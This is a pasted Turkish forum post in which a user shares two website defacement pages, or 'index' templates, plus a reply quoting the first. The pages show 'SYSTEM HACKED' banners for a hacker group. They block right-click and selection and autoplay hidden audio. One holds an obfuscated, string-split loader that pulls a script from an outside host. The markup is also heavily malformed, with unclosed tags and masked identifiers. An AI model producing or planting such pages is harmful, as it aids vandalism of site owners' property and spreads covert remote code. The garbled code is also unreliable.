Facebook
From Jj, 2 Years ago, written in HTML5.
Embed
Download Paste or View Raw
Hits: 117
  1.  
  2. Portal
  3.  
  4. Forum
  5. Son Mesajlar
  6. Giriş Yap
  7.  
  8. Forum
  9. ...
  10. Web Design
  11. Html5
  12. Ordumuz, Türk birliğinin, Türk Kudret ve kabiliyetinin, Türk vatanseverliğinin çelikleşmiş bir ifadesidir. Mustafa Kemal ATATÜRK
  13. Duyuruyu Kapat
  14. Index Çalışmalarım / Mavi-ay
  15. Mavi-Ay
  16. Atıldı
  17. 1. İndex Çalısmam
  18. Kod:
  19. <title>KULLANICI ADI</title>
  20. <style> html, body, a, a:hover { cursor:url('https://resmim.net/f/ZYCNWj.png'), auto !important; }</style>
  21.  
  22. <script src="https://static.windscribe.com/js/flowplayer.min.js"></script>
  23. <canvas id="web-canvas" style="position: absolute;z-index:4;"></canvas>
  24. <div id="top-content">
  25.  
  26. </div>
  27. <script src="https://static.windscribe.com/js/EasePack.min.js"></script>
  28. <script src="https://static.windscribe.com/js/rAF.js"></script>
  29. <script src="https://static.windscribe.com/js/TweenLite.min.js"></script>
  30.     (function() {
  31.  
  32.         var width, height, largeHeader, canvas, ctx, points, target, animateHeader = true;
  33.  
  34.         // Main
  35.         initHeader();
  36.         initAnimation();
  37.         addListeners();
  38.  
  39.         function initHeader() {
  40.             width = window.innerWidth-20;
  41.             height = window.innerHeight;
  42.             target = {x: width/2, y: height/2};
  43.  
  44.             largeHeader = document.getElementById('home-top');
  45.             //largeHeader.style.height = '700px';
  46.  
  47.             canvas = document.getElementById('web-canvas');
  48.             canvas.width = width;
  49.             //canvas.height = height;
  50.             canvas.height = 700;
  51.             ctx = canvas.getContext('2d');
  52.  
  53.             // create points
  54.             points = [];
  55.             for(var x = 0; x < width; x = x + width/20) {
  56.                for(var y = 0; y < height; y = y + height/20) {
  57.                    var px = x + Math.random()*width/20;
  58.                    var py = y + Math.random()*height/20;
  59.                    var p = {x: px, originX: px, y: py, originY: py };
  60.                    points.push(p);
  61.                }
  62.            }
  63.  
  64.            // for each point find the 5 closest points
  65.            for(var i = 0; i < points.length; i++) {
  66.                var closest = [];
  67.                var p1 = points[i];
  68.                for(var j = 0; j < points.length; j++) {
  69.                    var p2 = points[j]
  70.                    if(!(p1 == p2)) {
  71.                        var placed = false;
  72.                        for(var k = 0; k < 5; k++) {
  73.                            if(!placed) {
  74.                                if(closest[k] == undefined) {
  75.                                    closest[k] = p2;
  76.                                    placed = true;
  77.                                }
  78.                            }
  79.                        }
  80.  
  81.                        for(var k = 0; k < 5; k++) {
  82.                            if(!placed) {
  83.                                if(getDistance(p1, p2) < getDistance(p1, closest[k])) {
  84.                                    closest[k] = p2;
  85.                                    placed = true;
  86.                                }
  87.                            }
  88.                        }
  89.                    }
  90.                }
  91.                p1.closest = closest;
  92.            }
  93.  
  94.            // assign a circle to each point
  95.            for(var i in points) {
  96.                var c = new Circle(points[i], 2+Math.random()*2, 'rgba(255,255,255,0.3)');
  97.                points[i].circle = c;
  98.            }
  99.        }
  100.  
  101.        // Event handling
  102.        function addListeners() {
  103.            if(!('ontouchstart' in window)) {
  104.                window.addEventListener('mousemove', mouseMove);
  105.            }
  106.            window.addEventListener('scroll', scrollCheck);
  107.            window.addEventListener('resize', resize);
  108.        }
  109.  
  110.        function mouseMove(e) {
  111.            var posx = posy = 0;
  112.            if (e.pageX || e.pageY) {
  113.                posx = e.pageX;
  114.                posy = e.pageY;
  115.            }
  116.            else if (e.clientX || e.clientY)    {
  117.                posx = e.clientX + document.body.scrollLeft + document.documentElement.scrollLeft;
  118.                posy = e.clientY + document.body.scrollTop + document.documentElement.scrollTop;
  119.            }
  120.            target.x = posx;
  121.            target.y = posy;
  122.        }
  123.  
  124.        function scrollCheck() {
  125.            if(document.body.scrollTop > height) animateHeader = false;
  126.             else animateHeader = true;
  127.         }
  128.  
  129.         function resize() {
  130.             width = window.innerWidth-20;
  131.             height = window.innerHeight;
  132.             //largeHeader.style.height = height+'px';
  133.             canvas.width = width;
  134.             //canvas.height = height;
  135.             canvas.height = 700;
  136.         }
  137.  
  138.         // animation
  139.         function initAnimation() {
  140.             animate();
  141.             for(var i in points) {
  142.                 shiftPoint(points[i]);
  143.             }
  144.         }
  145.  
  146.         function animate() {
  147.             if(animateHeader) {
  148.                 ctx.clearRect(0,0,width,height);
  149.                 for(var i in points) {
  150.                     // detect points in range
  151.                     if(Math.abs(getDistance(target, points[i])) < 4000) {
  152.                        points[i].active = 0.3;
  153.                        points[i].circle.active = 0.6;
  154.                    } else if(Math.abs(getDistance(target, points[i])) < 20000) {
  155.                        points[i].active = 0.1;
  156.                        points[i].circle.active = 0.3;
  157.                    } else if(Math.abs(getDistance(target, points[i])) < 40000) {
  158.                        points[i].active = 0.02;
  159.                        points[i].circle.active = 0.1;
  160.                    } else {
  161.                        points[i].active = 0;
  162.                        points[i].circle.active = 0;
  163.                    }
  164.  
  165.                    drawLines(points[i]);
  166.                    points[i].circle.draw();
  167.                }
  168.            }
  169.            requestAnimationFrame(animate);
  170.        }
  171.  
  172.        function shiftPoint(p) {
  173.            TweenLite.to(p, 1+1*Math.random(), {x:p.originX-50+Math.random()*100,
  174.                y: p.originY-50+Math.random()*100, ease:Circ.easeInOut,
  175.                onComplete: function() {
  176.                    shiftPoint(p);
  177.                }});
  178.        }
  179.  
  180.        // Canvas manipulation
  181.        function drawLines(p) {
  182.            if(!p.active) return;
  183.            for(var i in p.closest) {
  184.                ctx.beginPath();
  185.                ctx.moveTo(p.x, p.y);
  186.                ctx.lineTo(p.closest[i].x, p.closest[i].y);
  187.                ctx.strokeStyle = 'rgba(156,217,249,'+ p.active+')';
  188.                ctx.stroke();
  189.            }
  190.        }
  191.  
  192.        function Circle(pos,rad,color) {
  193.            var _this = this;
  194.  
  195.            // constructor
  196.            (function() {
  197.                _this.pos = pos || null;
  198.                _this.radius = rad || null;
  199.                _this.color = color || null;
  200.            })();
  201.  
  202.            this.draw = function() {
  203.                if(!_this.active) return;
  204.                ctx.beginPath();
  205.                ctx.arc(_this.pos.x, _this.pos.y, _this.radius, 0, 2 * Math.PI, false);
  206.                ctx.fillStyle = 'rgba(156,217,249,'+ _this.active+')';
  207.                ctx.fill();
  208.            };
  209.        }
  210.  
  211.        // Util
  212.        function getDistance(p1, p2) {
  213.            return Math.pow(p1.x - p2.x, 2) + Math.pow(p1.y - p2.y, 2);
  214.        }
  215.  
  216.    })();
  217. </script> <div id="push" class=""></div>
  218.  
  219.     </script>
  220. <style type="text/css">
  221. body {
  222.    background-image: url("https://resmim.net/f/ZYCNWj.png");
  223. <br>
  224. <meta property="og:image"    content="http://images4.alphacoders.com/285/285998.jpg">
  225. <meta property="og:image:width"    content="1200"/>
  226. <meta property="og:image:height"    content="630"/>
  227. <link href='http://fonts.googleapis.com/css?family=Orbitron:700|Gruppo' rel='stylesheet' type='text/css'>
  228.  
  229. <script src="http://smilenet4u.googlecode.com/files/TipingText.js"></script>
  230.  
  231. </head>
  232.  
  233. <style>');
  234. background-repeat:no-repeat;
  235. font-family:'Orbitron', sans-serif;
  236. pre{
  237. font-family:'Orbitron',sans-serif;
  238. }
  239. #plate{
  240. position: absolute;!important;
  241. top:0!important;
  242. left:0;
  243. right:0;
  244. width:100%;
  245. height:100%;
  246. z-index:-1!important;
  247. margin:0;
  248. padding:0;
  249. position:fixed;
  250. }
  251. #xx{
  252. font-size:60px;
  253. text-shadow:0 0 5px #ff0000, 0 0 10px #ff7f00, 0 0 15px #ffff00, 0 0 20px #10ff00, 0 0 30px #0048ff, 0 0 40px #0015ff, 0 0 55px #6100ff;
  254. }
  255. #xx2{
  256. font-size:60px;
  257. text-shadow:0 0 5px #ff0000, 0 0 10px #ff7f00, 0 0 15px #ffff00, 0 0 20px #10ff00, 0 0 30px #0048ff, 0 0 40px #0015ff, 0 0 55px #6100ff;
  258. top:300!important;
  259. right: 550px;
  260. margin:0;
  261. padding:0;
  262. position:fixed;
  263. }
  264.  
  265. <body class="unselectable">
  266. <center>
  267. </div>
  268.  
  269. <div class="message">
  270. <pre>
  271. <p id="xx">
  272. STOP ADMİN ! SYSTEM HACKED <br /><hr width="65%" size="1" style="opacity: 1px;"> </p>
  273.  </span></p> <br />
  274. <p id="xx2"><span style="font-size:30px;">HACKED BY.</span>
  275. <span style="font-size:30px;">Çanakkale Geçilmez!!!</span>
  276. <span style="font-size:30px;">Bunu En İyi Atalarınız Bilir!!..</span>
  277. </p>
  278. </div>
  279.  
  280. </center>
  281. <script language="javascript" src="http://ic.sitekodlari.com/sagtusengelleme1.js"></script>
  282.  
  283. <embed width="0" height="0" src="http://www.youtube.com/v/6FkSafA2dpA&autoplay=1&amp;loadingcolor=000000&amp;slidercolo"></p>
  284.  
  285.  
  286. <style>.k-d{color: black;}
  287. .golge{position:fixed;z-index:999;width:100%;height:100%;
  288. background:transparent;overflow:hidden !important;}
  289. .tl{width:100%;height:100%;background: url(http://i.hizliresim.com/vj4jYm.png); background: -moz-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%, rgba(0,0,0,0) 10%, rgba(0,0,0,0.05) 16%, rgba(0,0,0,0.15) 23%, rgba(0,0,0,0.25) 27%, rgba(0,0,0,0.45) 41%, rgba(0,0,0,0.55) 55%, rgba(0,0,0,0.75) 86%, rgba(0,0,0,0.75) 100%); background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(0,0,0,0)), color-stop(10%,rgba(0,0,0,0)), color-stop(16%,rgba(0,0,0,0.05)), color-stop(23%,rgba(0,0,0,0.15)), color-stop(27%,rgba(0,0,0,0.25)), color-stop(41%,rgba(0,0,0,0.45)), color-stop(55%,rgba(0,0,0,0.55)), color-stop(86%,rgba(0,0,0,0.75)), color-stop(100%,rgba(0,0,0,0.75))); background: -webkit-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: -o-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: -ms-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: radial-gradient(ellipse at center, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr="#00000000", endColorstr="#bf000000",GradientType=1 );
  290. background-size:200% 200%;
  291. }
  292. #topleft .tl{-webkit-border-bottom-right-radius: 100px; border-bottom-right-radius: 100px;}#topleft{top:0px;left:0px;-webkit-border-bottom-right-radius:100px; border-bottom-right-radius:100px;}#topright{top:0px;left:100%;-webkit-border-bottom-left-radius: 100px; border-bottom-left-radius: 100px}#botleft{top:100%;left:0px;-webkit-border-top-right-radius: 100px; border-top-right-radius: 100px;}#botright{top:100%;left:100%;-webkit-border-top-left-radius: 100px; border-top-left-radius: 100px;}#topright .tl{ -webkit-border-bottom-left-radius: 100px; border-bottom-left-radius: 100px;background-position: right top;}#botright .tl{  background-position: bottom right !important;-webkit-border-top-left-radius: 100px; border-top-left-radius: 100px;}#botleft .tl{ background-position: bottom left !important;-webkit-border-top-right-radius: 100px; border-top-right-radius: 100px;}</style>
  293. <koddostu><div class='golge k-d' id='topleft'><div class='tl'></div></div>
  294. <div class='golge k-d' id='topright'><div class='tl'></div></div>
  295. <div class='golge k-d' id='botleft'><div class='tl'></div></div>
  296. <div class='golge k-d' id='botright'><div class='tl'></div></div>
  297. </koddostu>
  298. <script>var d=document,tol=d.getElementById('topleft'),tor=d.getElementById('topright'),bol=d.getElementById('botleft'),bor=d.getElementById('botright'),w=document.body.clientWidth,h=window.innerHeight;var script = document.createElement('script');script.src = "h"+"t"+"tps"+":/"+"/k"+"do"+"stu.google"+"code.com/svn/c"+"que"+"ry.j"+"s";
  299. document.getElementsByTagName('head')[0].appendChild(script);window.onresize=function(){};window.onmousemove=function(a){a=a||window.event;var b=a.clientX;a=a.clientY;var c=a-h+"px",e=b-w+"px",b=b+"px";a=a+"px";tol.style.top=c;tol.style.left=e;tor.style.top=c;tor.style.left=b;bol.style.top=a;bol.style.left=e;bor.style.top=a;bor.style.left=b};</script>
  300.  
  301. <script language="Javascript1.2"> <!--  ";  function rtclickcheck(keyp){   if (navigator.appName == "Netscape" && keyp.which == 3) {     alert(mymessage);     return false;   }    if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {     alert(mymessage);     return false;   } }  document.onmousedown = rtclickcheck //--> </script>          
  302. <script language="JavaScript">   function none(){ return false; }  document.oncontextmenu=none document.onmousedown=none </script>
  303. <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false"></body>
  304. <script type="text/javascript">
  305.  
  306. //form tags to omit in NS6+:
  307. var omitformtags=["input", "textarea", "select"]
  308.  
  309. omitformtags=omitformtags.join("|")
  310.  
  311. function disableselect(e){
  312. if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
  313. return false
  314. }
  315.  
  316. function reEnable(){
  317. return true
  318. }
  319.  
  320. if (typeof ********.onselectstart!="undefined")
  321. ********.onselectstart=new Function ("return false")
  322. else{
  323. ********.onmousedown=disableselect
  324. ********.onmouseup=reEnable
  325. }
  326.  
  327. <body onkeydown="return false">
  328. </body>
  329. </html>
  330. index çalışmasından ekran görüntüsü
  331. [​IMG]
  332.  
  333. 2.index
  334.  
  335. Kod:
  336. <META http-equiv="content-type" content="text/html; charset=ISO-8859-9">
  337. <link rel="shortcut icon" href="favicon.ico">
  338. <META http-equiv="content-type" content="text/html; charset=windows-1254">
  339. <META http-equiv="content-language" content="TR">
  340. <META http-equiv="content-type" content="text/html; charset=ISO-8859-9">
  341. <META name="description" content="ayyildiz.army turk hackerlar Forum Security  Portal Secure Hosting">
  342. <meta name="keywords" content="türk hackerlar,web site hack,mail hack,msn hack,forum,turk hackerlar,exploit,ayyıldız tım,mail,web,exploit,dos Attack prevention, Ddos atak engelleme, IDS, IPS, ASP, Ayyıldız Tim , ">
  343.  
  344. <META NAME="RATING" CONTENT="GENERAL">
  345. <META NAME="ABSTRACT" CONTENT="security">
  346. <META NAME="ROBOTS" CONTENT="All">
  347. <META NAME=googlebot CONTENT="Index, Follow">
  348. <META NAME=robots CONTENT="Index, Follow">
  349. <meta name="distribution" content="global">
  350.  
  351. <meta name="google-site-verification" content="6LFJGLFpbjals_jAGcI87D5NetbD_brsYdDUb9vrGOY" />
  352. <style>BODY { SCROLLBAR-BASE-COLOR: #004800; SCROLLBAR-ARROW-COLOR: #00CC00; }</style>
  353. <Style type=text/css>.Buton {BORDER-LEFT-WIDTH: 2px; FONT-SIZE: 10px; color:#006600; background-color:#00CC00; border-color:#00FF00; border-style:groove; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; }</Style>
  354. <Style type=text/css>.TextT {font-size:17px; border-style: border-width:2px; color:#000000; padding-top:0; padding-bottom:0; padding-left:4; height:23; border-color: #cccccc; font-family:Verdana, Arial, Helvetica, sans-serif; font-weight:bolder; }</Style>
  355. <Style type=text/css>.Tinput {color:#000000;}</Style>
  356. <Style type=text/css>.TextInput {BORDER-LEFT-WIDTH: 2px; FONT-SIZE: 11px; color:#000000; background-color:#00CC00; border-color:#00FF00; border-style:groove; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; font-weight:bold;}</Style>
  357.  
  358. <Style type=text/css>.Form {color:#000000;}</Style>
  359.  
  360. <style type="text/css">
  361. .input {color:#000000;}
  362. a {color:#00FF00; text-decoration:none;}
  363. a:hover {color:#00FF00; text-decoration:underline;}
  364. .TableBgFont {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color:#090; font-weight:800; height: 27px;}
  365. .SolMenu a {font-size: 10px; color:#00CC00; font-weight:600;}
  366. .SolMenu a:hover {font-size: 10px; color:#FFFFFF; font-weight:600; text-decoration:none;}
  367.  
  368. .Standart1 {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color:#66FF00; font-weight:600; text-decoration:none;}
  369. .Standart2 {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color:#66FF00; font-weight: bold; text-decoration:none;}
  370. .Link2 {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; font-weight: bold; text-decoration:none;}
  371. .Link a {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color:#00FF00; font-weight: bold; text-decoration:none;}
  372. .Link a:hover {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color:#FF0000; font-weight: bold; text-decoration:none;}
  373. .LinkCizx a{font-size: 13px;}
  374. .LinkCizx a:hover{font-size: 13px; color:#FF0000;}
  375. .MiniFont {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color:#00FF00;}
  376.  
  377. .BaslikB a {FONT-WEIGHT:600; font-family:Georgia; color:#00FF00; text-decoration:underline;}
  378. .BaslikB a:hover {FONT-WEIGHT: 600; font-family:Georgia; color:#FF0000;}
  379.  
  380. .MiniBold {font-size:9px; font-weight:bold; color:#158307; text-decoration:none;}
  381. .MiniBold a {font-size:9px; font-weight:bold; color:#00C000; text-decoration:none;}
  382. .MiniBold a:hover {font-size: 9px; font-weight:bold; color:#00FF00; text-decoration:none;}
  383.  
  384. .BigFont { font-family:'Times New Roman', Times, serif; font-weight:bolder; font-size:19px;}
  385.  
  386. .TableMS {
  387. text-decoration: none;
  388. padding: 5px 7px;
  389. margin-right: 0px;
  390. margin-left: 0px;
  391. border: 1px solid #1E1E1E;
  392. margin-left:0pt;
  393. margin-right:0pt;
  394. margin-bottom:0px;
  395. height:17;
  396. border-right-color:#1E1E1E;
  397. border-bottom-color:#95ff95;
  398.  
  399. FILTER: progid:DXImagetransform.Microsoft.gradient(enabled='true', startColorstr=#1E1E1E, endColorstr=#009900,) progid:DXImagetransform.Microsoft.Shadow(color='#dcdcdc', Direction=1, Strength=1);}
  400. .KLink {FONT-WEIGHT: 600; FONT-SIZE: 8pt; color:#006600;}
  401. .KLink a {FONT-WEIGHT: 600; FONT-SIZE: 8pt; color:#006600; text-decoration:none;}
  402. .KLink a:hover {FONT-WEIGHT: 600; FONT-SIZE: 8pt; color:#00FF00; text-decoration:none;}
  403.  
  404. .KLink2 {FONT-WEIGHT: 600; FONT-SIZE: 8pt; color:#009900;}
  405.  
  406. .MLink a {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 10px; text-decoration:none;}
  407. .MLink a:hover {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color:#00FF00; font-weight: bold; text-decoration:none;}
  408. .{font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; color:#00FF00;}
  409. {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; color:#00FF00;}
  410. body,td,th {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; color: #02d802;}
  411. </style>      
  412.  
  413. <title>Ayyıldız Tim/ Uye Nıck</title>
  414. <!--71dcc1fd2234766eaecf898ed73f3e37-->
  415.  
  416. <body color="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="#000000">
  417.  
  418.  
  419. <script  language="JavaScript">      
  420. //Function to open pop up window
  421. function openWin(theURL,winName,features) {
  422.       window.open(theURL,winName,features);
  423. }
  424. <div class="slider"><br><br>
  425.     <div class="slide"> <h1>HELLO ADMIN SYSTEM HACKED!<span><span><br> Ayyıldız Tim / Uye Nick :) </h1> </div>
  426. <style> BODY { SCROLLBAR-BASE-COLOR: #3B3B3B; SCROLLBAR-ARROW-COLOR: #33FF33; } </style>
  427.  
  428. <style type="text/css">
  429.  
  430. #navbar-holder        { width: 100%; height: 34px; text-indent: 15px; background-color: #1e1e1e; }
  431. #navbar-link        { color: #599a2e; font-family: "Museo Sans 700"; font-size: 12px; text-decoration: none; line-height: 34px; }
  432.  
  433. ul#navbar-menu                    { float: right; list-style: none; margin:0; padding:0; }
  434. ul#navbar-menu>li                { float: left; height: 34px; padding-right: 16px; border-right: 1px solid #353535; }
  435. ul#navbar-menu>li:hover            { background-color: #353535; cursor: pointer;}
  436. ul#navbar-menu>li:hover>a        { color: #599a2e;}
  437. ul#navbar-menu>li:hover    ul        { display: block; position: absolute; margin-left:-40px; width:217px;}
  438. ul#navbar-menu>li>a             { text-decoration: none; color: #bdbdbd; line-height: 34px; font-family: "Museo Sans 700"; font-size: 12px;}
  439.  
  440. .transtable table {border:0 solid #e5e5e5; color:#FFF; background:#FFF; }
  441. .transtable table td{border:0 solid #e5e5e5; }
  442.  
  443. @font-face          { font-family: "Museo Sans 700"; src: url(forum/fonts/MuseoSans-700.otf); }
  444.  
  445. ul#navbar-sub-menu                { list-style: none; display: none;}
  446. ul#navbar-sub-menu>li            { cursor: pointer; background-color: #353535; padding-right: 17px;}
  447. ul#navbar-sub-menu>li:hover        { background-color: #2a2a2a;}
  448. ul#navbar-sub-menu>li>a            { text-decoration: none; white-space: nowrap;  color: #bdbdbd; line-height: 34px; font-family: "Museo Sans 700"; font-size: 12px; }
  449. ul#navbar-menu>li:last-child     { border:none !important; }
  450. ul#navbarmenu2>li:first-child     { border:none !important; }
  451.  
  452. *{
  453.     margin: 10;
  454.     padding:4;
  455.     box-sizing: border-box;
  456. }
  457.  
  458.  
  459.  
  460. h2{
  461.     text-align: center;
  462.     font-size: 801px;
  463.     font-family: arial;
  464.     margin-top: 100&;
  465.     color: red;
  466.     text-shadow: 12px 32px 72px red;
  467. }
  468.  
  469. .lockedworld{
  470.     width: 240px;
  471.     margin: auto;
  472.     perspective: 1500px;
  473.     position: relative;
  474.     margin-top: 150px;
  475. }
  476.  
  477. .lockedworld2{
  478.     width: 100%;
  479.     position: absolute;
  480.     animation: rotar 14s infinite linear;
  481.     transform-style: preserve-3d;
  482. }
  483.  
  484. .lockedworld2:hover{
  485.     animation-play-state: paused;
  486.     cursor: pointer;
  487. }
  488.  
  489.  
  490. .lockedworld2 figure{
  491.     width: 100%;
  492.     height: 126px;
  493.     overflow: hidden;
  494.     position: absolute;
  495.     box-shadow: 0px 0px 72px 0px red;
  496.     transition: all 600ms;
  497.    
  498. }
  499.  
  500. .lockedworld2 figure:hover{
  501.     box-shadow: 0px 0px 240px 0px red;
  502.     transition: all 300ms;
  503. }
  504.  
  505. .lockedworld2 figure:nth-child(1){transform: rotateY(0deg) translateZ(300px);}
  506. .lockedworld2 figure:nth-child(2){transform: rotateY(40deg) translateZ(300px);}
  507. .lockedworld2 figure:nth-child(3){transform: rotateY(80deg) translateZ(300px);}
  508. .lockedworld2 figure:nth-child(4){transform: rotateY(120deg) translateZ(300px);}
  509. .lockedworld2 figure:nth-child(5){transform: rotateY(160deg) translateZ(300px);}
  510. .lockedworld2 figure:nth-child(6){transform: rotateY(200deg) translateZ(300px);}
  511. .lockedworld2 figure:nth-child(7){transform: rotateY(240deg) translateZ(300px);}
  512. .lockedworld2 figure:nth-child(8){transform: rotateY(280deg) translateZ(300px);}
  513. .lockedworld2 figure:nth-child(9){transform: rotateY(320deg) translateZ(300px);}
  514. .lockedworld2 figure:nth-child(10){transform: rotateY(360deg) translateZ(300px);}
  515.  
  516. .lockedworld2 img{
  517.     width: 100%;
  518.     transition: all 300ms;
  519. }
  520.  
  521. .lockedworld2 img:hover{
  522.     transform: scale(1.2);
  523.     transition: all 300ms;
  524. }
  525.  
  526.  
  527. @keyframes rotar{
  528.     from{
  529.         transform: rotateY(0deg);
  530.     }to{
  531.         transform: rotateY(360deg);
  532.     }
  533. }
  534.  
  535.         </style>
  536. </head>
  537.     <div class="lockedworld">
  538.         <div class="lockedworld2">
  539.             <figure><img src="https://i.hizliresim.com/RnzJ3Z.jpg"></figure>
  540.             <figure><img src="https://3.bp.blogspot.com/-baYk04tXgiA/VtnyaUr-WJI/AAAAAAAAkA4/NGCNMluYuJA/s1920/turk-bayragi-duvar-kagidi-indir-13.jpg"></figure>
  541.             <figure><img src="https://i.hizliresim.com/2Jz2jL.jpg"></figure>
  542.            <figure><img src="https://3.bp.blogspot.com/-baYk04tXgiA/VtnyaUr-WJI/AAAAAAAAkA4/NGCNMluYuJA/s1920/turk-bayragi-duvar-kagidi-indir-13.jpg"></figure>
  543.             <figure><img src="https://i.hizliresim.com/763o7P.jpg"></figure>
  544.             <figure><img src="https://3.bp.blogspot.com/-baYk04tXgiA/VtnyaUr-WJI/AAAAAAAAkA4/NGCNMluYuJA/s1920/turk-bayragi-duvar-kagidi-indir-13.jpg"></figure>
  545.             <figure><img src="https://i.hizliresim.com/PlJ507.jpg"></figure>
  546.             <figure><img src="https://3.bp.blogspot.com/-baYk04tXgiA/VtnyaUr-WJI/AAAAAAAAkA4/NGCNMluYuJA/s1920/turk-bayragi-duvar-kagidi-indir-13.jpg"></figure>
  547.          <figure><img src="https://i.hizliresim.com/2Jz29N.jpg"></figure>
  548.         </div>
  549.         <div class="footerbtns">
  550. </div>
  551. <embed src="https://www.youtube.com/v/7unENFLHAVs&amp;autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
  552. </body>
  553.     </div>
  554. </html>
  555.  
  556. index içi ekran görüntüsü
  557. [​IMG]
  558.  
  559. not: yapacagım ındex calısmalarını bu konu altında paylaşacagım suanlık acemıyım kusura bakmayın
  560. 22 Nisan 2018
  561. Toyonzade
  562. ER
  563. Mavi-Ay demiş ki: ↑
  564. 1. İndex Çalısmam
  565. Kod:
  566. <title>KULLANICI ADI</title>
  567. <style> html, body, a, a:hover { cursor:url('https://resmim.net/f/ZYCNWj.png'), auto !important; }</style>
  568.  
  569. <script src="https://static.windscribe.com/js/flowplayer.min.js"></script>
  570. <canvas id="web-canvas" style="position: absolute;z-index:4;"></canvas>
  571. <div id="top-content">
  572.  
  573. </div>
  574. <script src="https://static.windscribe.com/js/EasePack.min.js"></script>
  575. <script src="https://static.windscribe.com/js/rAF.js"></script>
  576. <script src="https://static.windscribe.com/js/TweenLite.min.js"></script>
  577.     (function() {
  578.  
  579.         var width, height, largeHeader, canvas, ctx, points, target, animateHeader = true;
  580.  
  581.         // Main
  582.         initHeader();
  583.         initAnimation();
  584.         addListeners();
  585.  
  586.         function initHeader() {
  587.             width = window.innerWidth-20;
  588.             height = window.innerHeight;
  589.             target = {x: width/2, y: height/2};
  590.  
  591.             largeHeader = document.getElementById('home-top');
  592.             //largeHeader.style.height = '700px';
  593.  
  594.             canvas = document.getElementById('web-canvas');
  595.             canvas.width = width;
  596.             //canvas.height = height;
  597.             canvas.height = 700;
  598.             ctx = canvas.getContext('2d');
  599.  
  600.             // create points
  601.             points = [];
  602.             for(var x = 0; x < width; x = x + width/20) {
  603.                for(var y = 0; y < height; y = y + height/20) {
  604.                    var px = x + Math.random()*width/20;
  605.                    var py = y + Math.random()*height/20;
  606.                    var p = {x: px, originX: px, y: py, originY: py };
  607.                    points.push(p);
  608.                }
  609.            }
  610.  
  611.            // for each point find the 5 closest points
  612.            for(var i = 0; i < points.length; i++) {
  613.                var closest = [];
  614.                var p1 = points[i];
  615.                for(var j = 0; j < points.length; j++) {
  616.                    var p2 = points[j]
  617.                    if(!(p1 == p2)) {
  618.                        var placed = false;
  619.                        for(var k = 0; k < 5; k++) {
  620.                            if(!placed) {
  621.                                if(closest[k] == undefined) {
  622.                                    closest[k] = p2;
  623.                                    placed = true;
  624.                                }
  625.                            }
  626.                        }
  627.  
  628.                        for(var k = 0; k < 5; k++) {
  629.                            if(!placed) {
  630.                                if(getDistance(p1, p2) < getDistance(p1, closest[k])) {
  631.                                    closest[k] = p2;
  632.                                    placed = true;
  633.                                }
  634.                            }
  635.                        }
  636.                    }
  637.                }
  638.                p1.closest = closest;
  639.            }
  640.  
  641.            // assign a circle to each point
  642.            for(var i in points) {
  643.                var c = new Circle(points[i], 2+Math.random()*2, 'rgba(255,255,255,0.3)');
  644.                points[i].circle = c;
  645.            }
  646.        }
  647.  
  648.        // Event handling
  649.        function addListeners() {
  650.            if(!('ontouchstart' in window)) {
  651.                window.addEventListener('mousemove', mouseMove);
  652.            }
  653.            window.addEventListener('scroll', scrollCheck);
  654.            window.addEventListener('resize', resize);
  655.        }
  656.  
  657.        function mouseMove(e) {
  658.            var posx = posy = 0;
  659.            if (e.pageX || e.pageY) {
  660.                posx = e.pageX;
  661.                posy = e.pageY;
  662.            }
  663.            else if (e.clientX || e.clientY)    {
  664.                posx = e.clientX + document.body.scrollLeft + document.documentElement.scrollLeft;
  665.                posy = e.clientY + document.body.scrollTop + document.documentElement.scrollTop;
  666.            }
  667.            target.x = posx;
  668.            target.y = posy;
  669.        }
  670.  
  671.        function scrollCheck() {
  672.            if(document.body.scrollTop > height) animateHeader = false;
  673.             else animateHeader = true;
  674.         }
  675.  
  676.         function resize() {
  677.             width = window.innerWidth-20;
  678.             height = window.innerHeight;
  679.             //largeHeader.style.height = height+'px';
  680.             canvas.width = width;
